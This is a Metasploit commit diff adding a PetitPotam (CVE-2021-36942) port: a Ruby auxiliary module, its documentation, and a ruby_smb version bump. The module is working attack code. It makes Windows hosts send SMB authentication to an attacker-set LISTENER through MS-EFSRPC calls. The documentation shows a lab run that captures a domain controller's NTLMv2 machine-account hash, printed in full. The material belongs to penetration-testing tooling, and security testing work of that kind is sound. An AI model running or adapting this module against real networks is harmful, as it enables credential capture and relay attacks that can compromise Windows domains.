Land #16136, Add a port of PetitPotam to Metasploit

Author: cdelafuente-r7

Gemfile.lock

@@ -436,7 +436,7 @@ GEM
     ruby-progressbar (1.11.0)
     ruby-rc4 (0.1.5)
     ruby2_keywords (0.0.5)
-    ruby_smb (3.0.1)
+    ruby_smb (3.0.2)
       bindata
       openssl-ccm
       openssl-cmac

LICENSE_GEMS

@@ -161,7 +161,7 @@ ruby-prof, 1.4.2, "Simplified BSD"
 ruby-progressbar, 1.11.0, MIT
 ruby-rc4, 0.1.5, MIT
 ruby2_keywords, 0.0.5, "ruby, Simplified BSD"
-ruby_smb, 3.0.1, "New BSD"
+ruby_smb, 3.0.2, "New BSD"
 rubyntlm, 0.6.3, MIT
 rubyzip, 2.3.2, "Simplified BSD"
 sawyer, 0.8.2, MIT

documentation/modules/auxiliary/scanner/dcerpc/petitpotam.md

@@ -0,0 +1,62 @@
+## Vulnerable Application
+
+Coerce an authentication attempt over SMB to other machines via MS-EFSRPC methods.
+
+## Verification Steps
+Example steps in this format (is also in the PR):
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use auxiliary/scanner/dcerpc/petitpotam`
+4. Set the `RHOSTS` and `LISTENER` options
+5. (Optional) Set the `SMBUser`, `SMBPass` for authentication
+6. (Optional) Set the `PIPE` and `METHOD` options to adjust the trigger vector
+7. Do: `run`
+
+## Options
+
+### LISTENER
+The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
+should be hosting some kind of capture or relaying service.
+
+### PIPE
+The named pipe to use for triggering.
+
+### METHOD
+The RPC method to use for triggering. If 'Automatic' is selected, then all methods will be tried until one appears
+successful.
+
+## Scenarios
+
+### Windows Server 2019
+In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
+account. The target is a 64-bit Windows Server 2019 domain controller.
+
+```
+msf6 > use auxiliary/server/capture/smb 
+msf6 auxiliary(server/capture/smb) > run
+[*] Auxiliary module running as background job 0.
+msf6 auxiliary(server/capture/smb) > 
+[*] Server is running. Listening on 0.0.0.0:445
+
+msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/petitpotam 
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set RHOSTS 192.168.159.96
+RHOSTS => 192.168.159.96
+msf6 auxiliary(scanner/dcerpc/petitpotam) > set VERBOSE true
+VERBOSE => true
+msf6 auxiliary(scanner/dcerpc/petitpotam) > run
+
+[*] 192.168.159.96:445    - Binding to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.96[\lsarpc] ...
+[*] 192.168.159.96:445    - Bound to c681d488-d850-11d0-8c52-00c04fd90f7e:1.0@ncacn_np:192.168.159.96[\lsarpc] ...
+[*] 192.168.159.96:445    - Attempting to coerce authentication via EfsRpcOpenFileRaw
+
+[+] Received SMB connection on Auth Capture Server!
+[SMB] NTLMv2-SSP Client     : 192.168.250.237
+[SMB] NTLMv2-SSP Username   : MSFLAB\WIN-3MSP8K2LCGC$
+[SMB] NTLMv2-SSP Hash       : WIN-3MSP8K2LCGC$::MSFLAB:cd561910093ed145:aeaef46507cc87aecebb99717d5e8753:01010000000000000022f245ce16d801be5bf7c8b735b582000000000200120061006e006f006e0079006d006f00750073000100120061006e006f006e0079006d006f00750073000400120061006e006f006e0079006d006f00750073000300120061006e006f006e0079006d006f0075007300070008000022f245ce16d80106000400020000000800300030000000000000000000000000400000f12b37e798747bd58bfa63fc5b99630354f0c31717d6ec25bfa2214b4352b8530a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
+
+[+] 192.168.159.96:445    - Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful
+[*] 192.168.159.96:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/dcerpc/petitpotam) >
+```

modules/auxiliary/scanner/dcerpc/petitpotam.rb

@@ -0,0 +1,126 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'windows_error'
+require 'ruby_smb'
+require 'ruby_smb/error'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::DCERPC
+  include Msf::Exploit::Remote::SMB::Client::Authenticated
+  include Msf::Auxiliary::Scanner
+
+  EncryptingFileSystem = RubySMB::Dcerpc::EncryptingFileSystem
+
+  METHODS = %w[EfsRpcOpenFileRaw EfsRpcEncryptFileSrv].freeze
+  PIPE_HANDLES = {
+    lsarpc: {
+      uuid: EncryptingFileSystem::LSARPC_UUID,
+      opts: ['\\lsarpc'.freeze]
+    },
+    efsrpc: {
+      uuid: EncryptingFileSystem::EFSRPC_UUID,
+      opts: ['\\efsrpc'.freeze]
+    },
+    samr: {
+      uuid: EncryptingFileSystem::LSARPC_UUID,
+      opts: ['\\samr'.freeze]
+    },
+    lsass: {
+      uuid: EncryptingFileSystem::LSARPC_UUID,
+      opts: ['\\lsass'.freeze]
+    },
+    netlogon: {
+      uuid: EncryptingFileSystem::LSARPC_UUID,
+      opts: ['\\netlogon'.freeze]
+    }
+  }.freeze
+
+  def initialize
+    super(
+      'Name' => 'PetitPotam',
+      'Description' => %q{
+        Coerce an authentication attempt over SMB to other machines via MS-EFSRPC methods.
+      },
+      'Author' => [
+        'GILLES Lionel',
+        'Spencer McIntyre'
+      ],
+      'References' => [
+        [ 'CVE', '2021-36942' ],
+        [ 'URL', 'https://github.com/topotam/PetitPotam' ],
+        [ 'URL', 'https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-efsr/403c7ae0-1a3a-4e96-8efc-54e79a2cc451' ]
+      ],
+      'License' => MSF_LICENSE
+    )
+
+    register_options(
+      [
+        OptString.new('LISTENER', [ true, 'The host listening for the incoming connection', Rex::Socket.source_address ]),
+        OptEnum.new('PIPE', [ true, 'The named pipe to use for triggering', 'lsarpc', PIPE_HANDLES.keys.map(&:to_s) ]),
+        OptEnum.new('METHOD', [ true, 'The RPC method to use for triggering', 'Automatic', ['Automatic'] + METHODS ])
+      ]
+    )
+  end
+
+  def run_host(_ip)
+    connect
+    smb_login
+
+    handle_args = PIPE_HANDLES[datastore['PIPE'].to_sym]
+    fail_with(Failure::BadConfig, "Invalid pipe: #{datastore['PIPE']}") unless handle_args
+
+    handle = dcerpc_handle(
+      handle_args[:uuid],
+      handle_args.fetch(:version, '1.0'),
+      handle_args.fetch(:protocol, 'ncacn_np'),
+      handle_args[:opts]
+    )
+    vprint_status("Binding to #{handle} ...")
+    dcerpc_bind(handle)
+    vprint_status("Bound to #{handle} ...")
+
+    if datastore['METHOD'] == 'Automatic'
+      methods = METHODS
+    else
+      methods = [datastore['METHOD']]
+    end
+
+    methods.each do |method|
+      vprint_status("Attempting to coerce authentication via #{method}")
+      response = efs_call(
+        method,
+        file_name: "\\\\#{datastore['LISTENER']}\\#{Rex::Text.rand_text_alphanumeric(4..8)}\\#{Rex::Text.rand_text_alphanumeric(4..8)}.#{Rex::Text.rand_text_alphanumeric(3)}"
+      )
+      next if response.nil?
+
+      error_status = response.error_status.to_i
+      win32_error = ::WindowsError::Win32.find_by_retval(error_status).first
+      case win32_error
+      when ::WindowsError::Win32::ERROR_BAD_NETPATH
+        # this should be the response even if LISTENER was inaccessible
+        print_good('Server responded with ERROR_BAD_NETPATH which indicates that the attack was successful')
+        break
+      when nil
+        print_status("Server responded with unknown error: 0x#{error_status.to_s(16).rjust(8, '0')}")
+      else
+        print_status("Server responded with #{win32_error.name} (#{win32_error.description})")
+      end
+    end
+  end
+
+  def efs_call(name, **kwargs)
+    request = EncryptingFileSystem.const_get("#{name}Request").new(**kwargs)
+
+    begin
+      raw_response = dcerpc.call(request.opnum, request.to_binary_s)
+    rescue Rex::Proto::DCERPC::Exceptions::Fault => e
+      print_error "The #{name} Encrypting File System RPC request failed (#{e.message})."
+      return nil
+    end
+
+    EncryptingFileSystem.const_get("#{name}Response").read(raw_response)
+  end
+end